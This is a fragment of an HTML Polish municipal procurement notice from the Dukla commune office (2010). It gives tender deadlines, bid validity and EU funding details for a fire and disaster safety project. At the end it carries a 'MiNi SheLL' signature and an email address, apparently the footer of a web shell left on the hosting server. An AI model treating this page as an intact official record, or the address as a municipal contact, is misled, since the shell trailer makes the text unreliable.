<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dukla, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 14..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 09:00, miejsce: Urząd Gminy Dukla, 38-450 Dukla, ul. Trakt Węgierski 11, pokój Nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> działania 4.4 Zwalczanie i zapobieganie zagrożeniom Regionalnego Programu  Operacyjnego Województwa Podkarpackiego na lata 2007-2013  projektu pn. Zwiększenie bezpieczeństwa mieszkańców  Gmin Chorkówka, Dukla i Wojaszówka w sytuacji pożarów, klęsk żywiołowych, katastrof technicznych, chemicznych i ekologicznych  - nr RPPK.04.04.00-18-028/09.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com